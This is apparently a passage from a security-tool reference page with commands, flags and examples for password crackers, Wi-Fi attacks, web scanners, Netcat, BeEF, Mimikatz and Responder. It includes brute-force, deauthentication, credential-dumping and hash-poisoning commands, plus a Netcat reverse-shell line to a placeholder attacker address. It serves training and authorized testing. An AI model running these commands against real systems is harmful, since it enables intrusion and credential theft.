- Leverages multiple CPU cores for faster cracking.

Show cracked passwords:
`john --show cracked_hashes.txt`
- Displays previously cracked passwords without re-running the attack.

Always test on authorized systems only.

Common Flags/Options:

Flag	Explanation & Why
--format=<format>	Specifies hash type (md5, sha512, nt, etc.). Why: Ensures accurate cracking for the target hash.
--wordlist=<file>	Uses a wordlist file. Why: Speeds up attacks using common passwords.
--fork=<number>	Runs multiple processes. Why: Maximizes CPU utilization for faster cracking.
--incremental	Brute-force attack with all possible character combinations. Why: Attempts complex passwords systematically.
--mask=<mask>	Uses a custom mask pattern (e.g., ?l?l?l?d). Why: Efficiently targets specific password patterns.
--show	Displays previously cracked passwords. Why: Retrieve results without re-running the attack.
--rules	Applies mangling rules to wordlist entries. Why: Catches variations like Password1 or password!.
--restore	Resumes a previously interrupted session. Why: Avoids losing progress on long-running attacks.
--list=formats	Lists all supported hash formats. Why: Helps choose the correct cracking mode.

Examples:

• john --format=md5 --wordlist=/usr/share/wordlists/rockyou.txt md5_hashes.txt

  Cracks MD5 hashes using a common wordlist.

• john --format=sha1 --incremental hashes.txt

  Performs a brute-force attack on SHA1 hashes.

• john --format=nt --fork=8 --wordlist=/usr/share/wordlists/rockyou.txt nt_hashes.txt

  Cracks NTLM hashes using 8 parallel processes.

• john --format=sha512 --mask=?l?l?l?d?d --rules hashes.txt

  Uses a custom mask with rules for SHA512 hash cracking.

• john --show cracked_hashes.txt

  Displays cracked passwords from a previous session.

• john --format=sha256 --wordlist=custom_list.txt hashes.txt

  Use a custom wordlist to test SHA256 hashes.

• john --restore

  Resume an interrupted cracking session.

Tips:

• List Formats: List all supported hash formats: `john --list=formats`.
• Custom Wordlist: Create custom wordlists using tools like `crunch` or `cewl` for targeted attacks.
• Resume Session: Resume long-running or interrupted sessions with `john --restore`.
• Optimize Performance: Use `--fork` matching CPU cores for maximum efficiency.

Close

Show Advanced Tips

Notes: ⚠️ Only scan or try networks and systems you own or are authorized to test.

Description: Hydra is a high-performance network logon cracker that supports numerous protocols including SSH, FTP, HTTP(S), SMB, RDP, SMTP, and more. It performs rapid dictionary and brute-force attacks to test credentials, helping security auditors identify weak, default, or compromised passwords.

When & Why: Use Hydra during security assessments to: - Identify weak or default passwords on network services. - Test password policies and access controls. - Validate multi-user authentication resilience. Always run Hydra only on systems you own or have explicit permission to test.

Basic Usage (Educational Example):

Basic SSH attack:
`hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 ssh`
Explanation:
- `-l admin`: single target username.
- `-P rockyou.txt`: password list.
- `-t 4`: number of parallel threads.
- `ssh`: target protocol.

Web login brute-force:
`hydra -L users.txt -P passwords.txt -t 8 192.168.1.200 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"`
- Targets a web form by specifying the failure message.

Custom port & verbose:
`hydra -l user -P /usr/share/wordlists/rockyou.txt -s 2222 192.168.1.100 ssh -V`
- Tests non-standard SSH ports with real-time monitoring.

Save results:
`hydra -l guest -P passwords.txt -o ftp_results.txt 192.168.1.50 ftp`
- Saves successful credentials for reporting and review.

Always use responsibly on authorized systems.

Common Flags/Options:

Flag	Explanation & Why
-t <number>	Sets parallel tasks. Why: Balances speed and risk of detection or account lockouts.
-l <username>	Single username target. Why: Focuses the attack on a specific account.
-L <file>	Username list. Why: Tests multiple usernames efficiently.
-P <file>	Password list. Why: Enables testing of multiple passwords efficiently.
-o <file>	Save successful credentials to a file. Why: Useful for auditing and reporting.
-V	Verbose mode. Why: Displays every attempt for monitoring progress.
-s <port>	Custom service port. Why: Targets services on non-standard ports.
-w <seconds>	Delay between attempts. Why: Avoids triggering account lockouts or IDS alerts.
-R	Resume interrupted sessions. Why: Avoids restarting long scans from scratch.
-m <module>	Specify custom web parameters or failure strings. Why: Essential for HTTP(S) form attacks.

Examples:

• hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 ssh

  SSH brute-force for 'admin' using 4 threads.

• hydra -L users.txt -P passwords.txt -t 8 192.168.1.200 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

  Web login brute-force using username and password lists with HTTP POST form.

• hydra -l user -P /usr/share/wordlists/rockyou.txt -s 2222 192.168.1.100 ssh -V

  SSH brute-force on non-standard port 2222 with verbose output.

• hydra -l guest -P passwords.txt -o ftp_results.txt 192.168.1.50 ftp

  FTP brute-force and save results to file.

• hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 192.168.1.10 smb -w 3

  SMB brute-force using username list, 2 threads, and 3-second delay.

• hydra -R

  Resume an interrupted Hydra session without starting over.

Tips:

• List Protocols: Check supported protocols: `hydra -h`.
• Custom Wordlists: Generate targeted wordlists with `cewl` or `crunch` to improve efficiency.
• Resume Session: Use `-R` to resume long-running or interrupted scans.
• Optimize Threads: Set `-t` based on system and network capacity to avoid overload or detection.

Close

Show Advanced Tips

Notes: ⚠️ Only scan or try networks and systems you own or are authorized to test.

Description: Aircrack-ng is a comprehensive suite for Wi-Fi security auditing, including monitoring, packet capturing, injection, deauthentication, and cracking WEP, WPA, and WPA2 encryption. It is widely used for penetration testing and wireless network security assessments.

When & Why: Use Aircrack-ng during wireless assessments to: - Evaluate encryption strength of Wi-Fi networks. - Test password robustness and recovery methods. - Identify vulnerabilities such as weak keys or misconfigured networks. Always test on networks you own or have explicit permission to audit.

Basic Usage (Educational Example):

Step-by-step example:
1. Enable monitor mode:
`airmon-ng start wlan0`
- Creates wlan0mon interface for packet capture.
2. Capture packets from target AP:
`airodump-ng wlan0mon --bssid 00:11:22:33:44:55 -c 6 -w capture`
- Filters traffic to the specific AP on channel 6, saving packets to 'capture'.
3. Force clients to reconnect (generate handshake):
`aireplay-ng -0 5 -a 00:11:22:33:44:55 wlan0mon`
- Sends deauth packets to capture WPA/WPA2 handshake.
4. Crack the password:
`aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture.cap`
- Uses a wordlist to try cracking the captured handshake.

Always ensure Wi-Fi adapter supports monitor mode and packet injection, and only test authorized networks.

Common Flags/Options:

Flag	Explanation & Why
-0 <count>	Sends deauthentication packets (e.g., -0 5). Why: Forces clients to reconnect to capture handshakes.
-w <file>	Specifies output capture filename (airodump-ng) or wordlist (aircrack-ng). Why: Stores packets or passwords for analysis.
-b <BSSID>	Target a specific AP by MAC. Why: Focuses capture or cracking on one network.
-a <AP_MAC>	Deauth packets target AP MAC. Why: Ensures correct AP is attacked.
--bssid <BSSID>	Filters capture by AP MAC in airodump-ng. Why: Reduces noise from other networks.
-c <channel>	Set Wi-Fi channel (e.g., -c 6). Why: Captures traffic only on the correct AP channel.
--essid <SSID>	Filter capture by SSID name. Why: Focuses on a specific wireless network.
--ivs	Save only WEP IVS packets for faster cracking. Why: Reduces capture size and speeds up WEP cracking.

Examples:

• airmon-ng start wlan0

  Enable monitor mode on wlan0, creating wlan0mon interface.

• airodump-ng wlan0mon --bssid 00:11:22:33:44:55 -c 6 -w capture

  Capture packets from a specific AP on channel 6.

• aireplay-ng -0 5 -a 00:11:22:33:44:55 wlan0mon

  Send 5 deauth packets to force client reconnections.

• aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture.cap

  Crack WPA/WPA2 key from captured handshake using a wordlist.

• airodump-ng wlan0mon --essid 'MyWiFi' -w wifi_capture

  Capture packets filtered by SSID name, saving to 'wifi_capture'.

Tips:

• Check Interfaces: List wireless interfaces: `airmon-ng` or `iwconfig`.
• Verify Monitor Mode: Confirm monitor mode: `iwconfig wlan0mon`.
• Wordlist Source: Use strong wordlists like rockyou.txt or generate custom ones with `crunch` or `cewl`.
• Handshake Verification: Check if handshake captured: `aircrack-ng capture.cap` before attempting full crack.

Close

Show Advanced Tips

Notes: ⚠️ Only scan or try networks and systems you own or are authorized to test.

Description: OWASP ZAP (Zed Attack Proxy) is a GUI-based open-source web application security scanner. It identifies vulnerabilities such as XSS, SQL injection, CSRF, directory traversal, and misconfigurations. Supports automated scanning, spidering, proxying, and scripting for comprehensive web security testing.

When & Why: Use OWASP ZAP during web app penetration testing to: - Detect common vulnerabilities in web applications. - Validate security fixes and monitor regressions. - Audit applications in CI/CD pipelines with automation. Ideal for developers, security testers, and professionals in controlled environments.

Basic Usage (Educational Example):

1. Launch GUI: `zap.sh` or on Windows `zap.bat`.
2. Configure browser proxy to 127.0.0.1:8080 to intercept traffic.
3. Spider the target website to discover URLs (e.g., http://192.168.1.100).
4. Run Active Scan for automated vulnerability detection.
5. For CLI automation:
`zap.sh -cmd -quickurl http://192.168.1.100 -quickout report.xml`
- Scans a URL quickly and saves results.
6. Resume sessions with `-session <file>` to continue previous scans.
Always test only applications you own or have explicit permission to scan.

Common Flags/Options:

Flag	Explanation & Why
-cmd	Runs ZAP in command-line mode and exits after completion. Why: Useful for scripting and CI/CD automation.
-quickurl <URL>	Scans a single URL. Why: Quick and targeted scanning without launching GUI.
-config <key=value>	Set configuration options (e.g., scanner.maxChildren=10). Why: Customize scan behavior such as depth or thread count.
-quickout <file>	Saves scan report to a file. Why: Stores results in formats like XML, HTML, or JSON for analysis.
-port <port>	Set the proxy port (default 8080). Why: Allows using custom ports to avoid conflicts.
-silent	Minimal output mode. Why: Reduces verbosity for automated scans or scripts.
-session <file>	Load a saved session. Why: Resume previous scans with existing context or URLs.
-addoninstall <addon>	Install ZAP add-ons from CLI. Why: Extend ZAP capabilities without GUI.
-daemon	Run ZAP in daemon mode. Why: Supports remote API access and background scanning.

Examples:

• zap.sh -cmd -quickurl http://192.168.1.100 -quickout zap_report.xml

  Quick CLI scan on a URL with XML report output.

• zap.sh -port 8081 -cmd -quickurl https://testapp.local

  Scan URL with a custom proxy port.

• zap.sh -config scanner.maxChildren=5 -quickurl http://192.168.1.100

  Limit spider depth for faster results.

• zap.sh -cmd -session previous_scan.session -quickout report.html

  Resume a saved session and export report in HTML.

• zap.sh -silent -quickurl http://localhost:8080 -quickout silent_report.json

  Perform a silent scan and save results in JSON.

Tips:

• Proxy Setup: Set browser proxy to 127.0.0.1:8080 to intercept traffic; use ZAP’s built-in browser for convenience.
• Api Access: Enable ZAP API with `-config api.key=YOUR_KEY` for CI/CD automation or integration with other tools.
• Custom Scripts: Use ZAP’s script console to add custom passive or active scanning rules.
• Context Scanning: Define contexts to scan only specific domains and URLs, reducing false positives.

Close

Show Advanced Tips

Description: Netcat (nc) is a versatile networking utility for TCP/UDP connections, capable of port scanning, banner grabbing, file transfer, and acting as a simple backdoor in controlled testing environments. It is often called the 'Swiss Army knife' of networking.

When & Why: Use Netcat for: - Testing open ports and listening services. - Transferring files between hosts. - Debugging network services. - Setting up temporary chat servers or reverse shells. Only use on systems and networks you own or are authorized to test.

Basic Usage (Educational Example):

1. Set up a listener on the local machine:
`nc -lvnp 4444`
- `-l`: listen mode
- `-v`: verbose output
- `-n`: skip DNS resolution
- `-p 4444`: specify port

2. Connect from a remote host:
`nc 192.168.1.50 4444`
- Initiates a connection to the listener.

3. Transfer files:
Sender: `nc -w 3 192.168.1.50 5555 < file.txt`
Receiver: `nc -l -p 5555 > file.txt`

4. Test port scanning:
`nc -zv 192.168.1.100 20-100`
- `-z`: zero-I/O mode, used for scanning ports.
- `-v`: verbose to see open ports.

Always test on authorized systems.

Common Flags/Options:

Flag	Explanation & Why
-l	Listen mode. Why: Sets up Netcat as a server to accept incoming connections.
-v	Verbose output. Why: Displays connection details and status messages.
-n	No DNS resolution. Why: Speeds up connections when using IP addresses.
-p <port>	Specify local port to listen on. Why: Controls the network port for server or client.
-u	UDP mode. Why: Switches Netcat from TCP to UDP.
-w <seconds>	Timeout for connections. Why: Limits waiting period for clients.
-z	Zero-I/O mode for scanning. Why: Check open ports without sending data.
-e <program>	Execute program after connection (e.g., `/bin/bash`). Why: Enables simple backdoors (for lab use only).

Examples:

• nc -lvnp 4444

  Start a TCP listener on port 4444 with verbose output.

• nc 192.168.1.50 4444

  Connect to the listener on remote host 192.168.1.50.

• nc -zv 192.168.1.100 20-1024

  Scan ports 20-1024 on a host to check which are open.

• nc -l -p 5555 > received_file.txt

  Set up a listener to receive a file.

• nc -w 3 192.168.1.50 5555 < file.txt

  Send a file to a listening Netcat instance.

• nc -u -l -p 1234

  Start a UDP listener on port 1234.

Tips:

• Quick Scan: Use `nc -zv <host> <ports>` to quickly check open ports.
• File Transfer: Combine Netcat with tar or gzip to transfer directories: `tar czf - folder | nc -l -p 5555`.
• Reverse Shell: For lab practice, use `nc -e /bin/bash <attacker_ip> <port>` to simulate reverse shells.

Close

Show Advanced Tips

Description: Dirb is a web content scanner that brute-forces directories and files on web servers using wordlists. It helps identify hidden endpoints, backup files, and other resources that may expose sensitive data.

When & Why: Use Dirb during web application reconnaissance to: - Discover hidden directories or files. - Identify unlinked resources like admin panels or backups. - Map web server structure before further testing. Always test on systems you own or have explicit permission to audit.

Basic Usage (Educational Example):

Basic usage:
`dirb http://192.168.1.100 /usr/share/wordlists/dirb/common.txt -o dirb_report.txt`
- `http://192.168.1.100`: target URL
- `/usr/share/wordlists/dirb/common.txt`: wordlist for brute-forcing
- `-o dirb_report.txt`: save results to file

Optional flags can modify scanning depth, verbosity, and recursion. Review results in the output file or terminal.

Common Flags/Options:

Flag	Explanation & Why
-o <file>	Specify an output file. Why: Saves scan results for analysis or reporting.
-r	Non-recursive mode. Why: Limits scanning to top-level directories only.
-S	Silent mode. Why: Reduces terminal output for cleaner logs.
-u	Specify a single URL instead of reading from a list. Why: Target specific endpoint quickly.
-w <wordlist>	Custom wordlist to use for brute-forcing. Why: Focus on specific patterns or expand coverage.
-x <extensions>	Scan specific file extensions (e.g., .php,.bak). Why: Finds hidden files with known extensions.
-p <proxy>	Use a proxy server. Why: Route requests through a proxy for monitoring or anonymization.
-t <threads>	Number of threads for parallel requests. Why: Speeds up scanning.

Examples:

• dirb http://192.168.1.100 /usr/share/wordlists/dirb/common.txt -o dirb_report.txt

  Scan a target web server and save results to a file.

• dirb http://192.168.1.100 /usr/share/wordlists/dirb/common.txt -r

  Scan without recursion to limit to top-level directories.

• dirb http://192.168.1.100 /usr/share/wordlists/dirb/common.txt -S

  Run in silent mode to reduce terminal output.

• dirb http://192.168.1.100 -w /usr/share/wordlists/custom.txt -x .php,.bak

  Scan using a custom wordlist and focus on .php and .bak files.

• dirb http://192.168.1.100 -p http://127.0.0.1:8080

  Scan through a proxy for traffic monitoring or anonymization.

Tips:

• Wordlist Selection: Choose large and relevant wordlists for better coverage; combine multiple wordlists if needed.
• Scan Safety: Start with non-recursive scans to avoid overloading the server.
• Review Results: Check output file regularly; look for 200 OK and 403 Forbidden responses for interesting paths.

Close

Show Advanced Tips

Description: Skipfish is a high-speed, active web application security reconnaissance tool. It maps web applications by automatically crawling, probing, and analyzing responses to identify potential vulnerabilities.

When & Why: Use Skipfish during web application penetration testing to: - Discover hidden directories and endpoints. - Identify potential vulnerabilities like XSS, SQL injection, and misconfigurations. - Generate a comprehensive site map for further testing. Always scan systems you own or have explicit permission to test.

Basic Usage (Educational Example):

Basic usage:
`skipfish -o output_dir http://192.168.1.100 -I /login`
- `-o output_dir`: directory to save results.
- `http://192.168.1.100`: target URL.
- `-I /login`: include login path for crawling.

Additional options can control scanning depth, wordlists, authentication, and reporting.

Common Flags/Options:

Flag	Explanation & Why
-o <dir>	Output directory. Why: Stores generated reports and site map.
-I <substr>	Include matching paths. Why: Focuses scanning on specific sections of the site.
-X <substr>	Exclude paths. Why: Avoids scanning irrelevant or sensitive areas.
-W <file>	Use custom wordlist. Why: Improves detection of hidden files and directories.
-S <session_file>	Resume previous session. Why: Allows continuation of interrupted scans.
-D <max_depth>	Set maximum crawl depth. Why: Limits scanning to relevant site structure.
-C <cookie_string>	Pass HTTP cookies. Why: Access authenticated areas during scanning.
-L <log_file>	Write detailed log output. Why: Helps with debugging or monitoring scan progress.
-v	Verbose mode. Why: Displays detailed progress and requests in terminal.

Examples:

• skipfish -o output_dir http://192.168.1.100

  Perform a basic scan on the target website, saving results to 'output_dir'.

• skipfish -o scan_results -I /login -X /logout http://192.168.1.100

  Include only login page and exclude logout page during scanning.

• skipfish -o output -W custom_words.txt http://192.168.1.100

  Scan using a custom wordlist for more thorough directory discovery.

• skipfish -o output -C 'PHPSESSID=abc123' http://192.168.1.100

  Scan authenticated pages using a session cookie.

• skipfish -o resume_scan -S previous_session.sess http://192.168.1.100

  Resume a previously interrupted scan from session file.

Tips:

• Wordlist Tuning: Use custom wordlists to detect hidden endpoints and uncommon directories.
• Scan Scope: Always define include/exclude paths (-I / -X) to reduce unnecessary requests.
• Output Review: Open 'index.html' in the output directory to view visual site maps and vulnerabilities.

Close

Show Advanced Tips

Description: Wapiti is an open-source web application vulnerability scanner that performs black-box testing by crawling web pages and injecting payloads to detect security issues like XSS, SQL injection, file disclosure, command execution, and other common vulnerabilities.

When & Why: Use Wapiti during web application penetration testing to: - Audit web apps for XSS, SQLi, and other vulnerabilities. - Validate security controls and ensure input validation. - Generate comprehensive reports for remediation. Always scan systems you own or have explicit permission to test.

Basic Usage (Educational Example):

Basic usage:
`wapiti -u http://192.168.1.100 -m xss,sql -f html`
- `-u`: target URL.
- `-m xss,sql`: modules for XSS and SQL injection scanning.
- `-f html`: output report format.

Wapiti can also handle authentication, custom headers, cookies, and advanced scanning modules.

Common Flags/Options:

Flag	Explanation & Why
-u <url>	Target URL. Why: Defines the web application to scan.
-m <modules>	Select modules (e.g., xss, sql, cmd). Why: Focus scan on specific vulnerability types.
-f <format>	Report format (e.g., html, json, txt). Why: Custom output for reporting.
-c <cookie_file>	Cookie file. Why: Performs authenticated scans.
-p <proxy>	Use a proxy (e.g., http://127.0.0.1:8080). Why: Intercept requests or scan via Burp Suite.
-H <header>	Add custom HTTP headers. Why: Required for authentication or special headers.
-s <skip_modules>	Skip specified modules. Why: Avoid scanning unnecessary tests.
-d <depth>	Crawl depth. Why: Limits scanning to avoid long runtimes.
-r <resume_file>	Resume previous scan session. Why: Continue interrupted scans without starting over.
-v	Verbose mode. Why: Displays progress and HTTP requests in terminal.

Examples:

• wapiti -u http://192.168.1.100 -m xss,sql -f html

  Scan target for XSS and SQLi vulnerabilities, generating an HTML report.

• wapiti -u http://192.168.1.100 -c cookies.txt -m xss,sql,cmd -f json

  Authenticated scan using cookie file for multiple modules and outputs JSON report.

• wapiti -u http://192.168.1.100 -p http://127.0.0.1:8080 -f txt

  Scan via a local proxy and save output in plain text format.

• wapiti -u http://192.168.1.100 -m all -d 3 -f html

  Perform a deep scan with all available modules, up to depth 3, saving an HTML report.

• wapiti -u http://192.168.1.100 -r previous_scan.ses -f html

  Resume a previous scan session and generate an HTML report.

Tips:

• Auth Scans: Use cookie files or authentication headers for scanning login-protected areas.
• Scan Scope: Use modules selectively (-m) to focus on relevant vulnerabilities and reduce scan time.
• Reporting: Generate multiple formats (-f) for stakeholders, developers, or compliance documentation.

Close

Show Advanced Tips

Description: Fierce is a DNS reconnaissance and network mapping tool that helps identify subdomains, hostnames, and IP ranges for a given domain. It performs brute-force, zone transfers, and reverse lookups to map the attack surface.

When & Why: Use Fierce during the reconnaissance phase of penetration testing to: - Discover subdomains and internal hosts. - Map IP ranges and network structure. - Identify potential entry points for further testing. Always scan networks and domains you own or have explicit permission to test.

Basic Usage (Educational Example):

Basic usage:
`fierce --domain example.local --wordlist subdomains.txt`
- `--domain`: target domain.
- `--wordlist`: list of subdomains for brute-forcing.

Fierce can also perform wide-range scans, reverse lookups, and attempt zone transfers.

Common Flags/Options:

Flag	Explanation & Why
--domain <domain>	Target domain. Why: Defines the scope of the scan.
--wordlist <file>	Subdomain wordlist. Why: Enables brute-force discovery of hostnames.
--wide	Scan /16 IP range for host discovery. Why: Performs broad network enumeration.
--dns <server>	Use a specific DNS server. Why: Ensures reliable DNS resolution or bypasses default server restrictions.
--reverse	Perform reverse lookups on IP ranges. Why: Maps IPs back to hostnames for additional discovery.
--file <output>	Save results to a file. Why: Keeps a record of discovered hosts and IPs.
--mask <CIDR>	Limit scan to a specific network range (e.g., 192.168.0.0/24). Why: Focuses scanning efforts and reduces time.

Examples:

• fierce --domain example.local --wordlist subdomains.txt

  Scan example.local using a custom subdomain wordlist to discover hosts.

• fierce --domain example.local --wide

  Perform a broad /16 network scan for all IPs in the domain range.

• fierce --domain example.local --dns 8.8.8.8 --wordlist subdomains.txt

  Use Google DNS server to resolve subdomains, ensuring reliable lookups.

• fierce --domain example.local --reverse --file results.txt

  Perform reverse DNS lookups on discovered IPs and save results to a file.

• fierce --domain example.local --mask 192.168.1.0/24

  Limit scanning to a specific subnet for focused enumeration.

Tips:

• Subdomain Lists: Use comprehensive subdomain wordlists like SecLists for better discovery coverage.
• Dns Reliability: Test multiple DNS servers if some queries fail or return incomplete results.
• Output Analysis: Review output for live hosts, IP ranges, and potential misconfigurations.

Close

Show Advanced Tips

Description: Unicornscan is an asynchronous, stateless network scanner designed for high-performance reconnaissance. It supports TCP, UDP, and ICMP scans, service fingerprinting, and can efficiently enumerate large networks.

When & Why: Use Unicornscan when you need: - Fast port scanning across large IP ranges. - Asynchronous scanning to avoid delays. - Service and OS fingerprinting. Always scan networks you own or have explicit permission to test.

Basic Usage (Educational Example):

Basic usage examples:
`unicornscan 192.168.1.100:a -mU -i eth0` - Perform a UDP scan on all ports.
`unicornscan 192.168.1.0/24:a -mT` - Perform a TCP scan on all hosts in a subnet.
`unicornscan 192.168.1.100:80-443 -mT` - Scan specific TCP ports.
Options allow targeting specific protocols, ports, and interfaces.

Common Flags/Options:

Flag	Explanation & Why
-m <mode>	Scan mode: T=TCP, U=UDP, S=SYN, A=ACK. Why: Choose the protocol and scan type.
-i <iface>	Network interface to use (e.g., eth0, wlan0). Why: Directs scan traffic through specific device.
:a	Scan all ports. Why: Ensures a comprehensive port scan.
:<start>-<end>	Scan specific port ranges. Why: Focus on relevant services and reduce scan time.
-v	Verbose mode. Why: Shows progress and packet information in real-time.
-r <rate>	Packet rate (packets per second). Why: Control scan speed to avoid network congestion or detection.
-l <logfile>	Save results to a file. Why: Keep records for analysis and reporting.
--banner	Attempt service banner grabbing. Why: Identify service version and fingerprinting info.

Examples:

• unicornscan 192.168.1.100:a -mU -i eth0

  Perform a UDP scan on all ports of a single host via eth0.

• unicornscan 192.168.1.0/24:a -mT

  Scan all TCP ports across a /24 subnet.

• unicornscan 192.168.1.100:22-80 -mT -v

  Verbose TCP scan on ports 22 to 80.

• unicornscan 192.168.1.50:a -mT --banner

  Perform TCP scan on all ports and grab service banners for fingerprinting.

• unicornscan 192.168.1.0/24:a -mT -r 1000 -l scan_results.txt

  Scan a subnet with 1000 packets/sec and save results to a file.

Tips:

• Use Rate Control: Adjust -r to balance scan speed and avoid detection or network issues.
• Combine Modes: Use different modes (-mT, -mU) for TCP/UDP reconnaissance.
• Analyze Output: Check banner info and logs to identify running services and potential vulnerabilities.

Close

Show Advanced Tips

Description: BeEF (Browser Exploitation Framework) is a GUI-based penetration testing tool focused on client-side attacks. It hooks browsers via JavaScript and allows security testers to launch exploits, gather browser info, and control the browser in a controlled environment.

When & Why: Use BeEF to assess browser security and the effectiveness of client-side protections. It is ideal for: - Testing XSS exploits and social engineering scenarios. - Evaluating browser plugin vulnerabilities. - Simulating real-world client-side attacks. Always target systems and browsers you own or have explicit permission to test.

Basic Usage (Educational Example):

Step-by-step usage example:
1. Start BeEF: `beef-xss`
2. Access the control panel via web browser: `http://127.0.0.1:3000/ui/panel`
3. Log in with default credentials (change immediately after first use).
4. Hook target browsers by injecting `hook.js` into the target page.
5. Use the GUI to run modules, gather information, and control hooked browsers.
6. Test only on websites and clients you own or are authorized to audit.

Common Flags/Options:

Flag	Explanation & Why
-c <file>	Use an alternate configuration file. Why: Allows custom BeEF settings.
--config <file>	Load a specific config file (equivalent to -c). Why: Overrides default settings for flexibility.
-x	Run in debug/verbose mode. Why: Provides detailed output for troubleshooting.
-p <port>	Specify a custom port for the control panel. Why: Avoids conflicts with other services.
-a <IP>	Bind BeEF to a specific IP address. Why: Restrict access to certain network interfaces.

Examples:

• beef-xss

  Start BeEF with default configuration and access the GUI at 127.0.0.1:3000.

• beef-xss -c custom_config.yaml

  Start BeEF with a custom configuration file for specialized setups.

• beef-xss -p 8080 -a 192.168.1.50

  Bind BeEF to a specific IP and port for network segmentation.

• beef-xss -x

  Launch BeEF in debug mode to troubleshoot startup or module issues.

Tips:

• Secure Credentials: Always change default admin credentials before hooking real browsers.
• Use Https: Enable SSL for the control panel when testing in environments with multiple users.
• Module Usage: Test modules individually to avoid unwanted side effects on hooked browsers.

Close

Show Advanced Tips

Description: Mimikatz is a post-exploitation tool for Windows systems that can extract plaintext passwords, hashes, Kerberos tickets, and other credential artifacts from memory. It is widely used for penetration testing and red teaming to assess credential security.

When & Why: Use Mimikatz after gaining authorized access to a Windows system to: - Extract passwords and hashes for testing account security. - Retrieve Kerberos tickets for lateral movement. - Evaluate the effectiveness of Windows credential protections (LSA, SAM, and NTLM). Always perform testing in isolated lab environments or with explicit permission.

Basic Usage (Educational Example):

Step-by-step usage example:
1. Launch Mimikatz on the target Windows system.
2. Elevate privileges: `privilege::debug` (needed for memory access).
3. Dump credentials: `sekurlsa::logonpasswords` (retrieves usernames and passwords).
4. Dump password hashes for offline cracking: `lsadump::sam`.
5. Optional: Export Kerberos tickets: `kerberos::list /export`.
6. Always work in controlled labs to avoid unauthorized access or damage.

Common Flags/Options:

Flag	Explanation & Why
privilege::debug	Enables debug privileges. Why: Required for accessing Windows memory and sensitive credential stores.
sekurlsa::logonpasswords	Extracts plaintext passwords, hashes, and login sessions from memory. Why: Retrieves credentials for assessment.
lsadump::sam	Extracts SAM database hashes for offline password cracking. Why: Allows testing password strength.
kerberos::list /export	Exports Kerberos tickets (TGT/TGS) for lateral movement testing. Why: Evaluates Kerberos security.
token::elevate	Elevates current process token. Why: Helps bypass permission restrictions for certain commands.
misc::log	Logs Mimikatz output to a file. Why: Records results for reporting or analysis.

Examples:

• mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

  Dump all available login credentials from memory on a Windows system.

• mimikatz.exe "privilege::debug" "lsadump::sam" exit

  Extract password hashes from SAM for offline cracking.

• mimikatz.exe "token::elevate" "sekurlsa::logonpasswords" exit

  Elevate token and dump credentials with higher privileges.

• mimikatz.exe "kerberos::list /export" exit

  Export Kerberos tickets for testing Kerberos-based authentication and lateral movement.

Tips:

• Use Lab: Always test Mimikatz in isolated lab environments to avoid accidental compromise.
• Patch Status: Check target Windows version; newer patches mitigate some credential extraction techniques.
• Combine Tools: Use with password cracking tools like John the Ripper or Hashcat for offline hash testing.

Close

Show Advanced Tips

Description: Responder is a network tool that poisons LLMNR, NBT-NS, and MDNS protocols to intercept and capture authentication hashes on local networks. It is primarily used in penetration testing and red team exercises to assess the security of network authentication.

When & Why: Use Responder in controlled local network environments to: - Capture NTLM and other Windows authentication hashes. - Test network segmentation and protocol exposure. - Evaluate defenses against rogue server attacks. Always run on networks you own or are explicitly authorized to test.

Basic Usage (Educational Example):

Step-by-step usage example:
1. Start Responder on your network interface: `responder -I eth0 -w On -r On`.
2. The tool will poison LLMNR, NBT-NS, and MDNS requests, responding with its own IP.
3. Wait for hosts to authenticate and capture NTLM challenge-response hashes.
4. Optionally use captured hashes with tools like Hashcat or John the Ripper for offline cracking.
5. Always ensure testing is authorized and contained within your lab or target network.

Common Flags/Options:

Flag	Explanation & Why
-I <iface>	Specifies the network interface to use (e.g., eth0). Why: Targets the correct network segment for poisoning.
-w On	Enable WPAD rogue proxy responses. Why: Captures credentials via Web Proxy Auto-Discovery.
-r On	Enable NetBIOS Name Service and WINS redirection. Why: Extends poisoning to additional protocols for more hash capture.
-f	Force responder to answer all requests. Why: Ensures maximum coverage in testing.
-d	Enable DNS spoofing. Why: Captures requests for domain names and credentials.
-v	Verbose mode. Why: Displays captured requests and responses in real-time.
-A	Enable SMB relay attacks. Why: Allows testing of relaying captured credentials to other hosts.

Examples:

• responder -I eth0 -w On -r On

  Basic setup to poison LLMNR, NBT-NS, and MDNS on eth0, capturing hashes from local hosts.

• responder -I wlan0 -f -v

  Force responses on WLAN interface and show verbose output for monitoring.

• responder -I eth0 -A

  Enable SMB relay attacks for post-exploitation testing in a lab environment.

• responder -I eth0 -d

  Enable DNS spoofing to capture domain-related authentication requests.

Tips:

• Interface Check: Use `ifconfig` or `ip a` to verify the correct network interface.
• Monitor Traffic: Combine with Wireshark or tcpdump to observe poisoning effects in real-time.
• Hash Usage: Captured NTLM hashes should be tested offline with tools like Hashcat; never use on unauthorized systems.

Close

Show Advanced Tips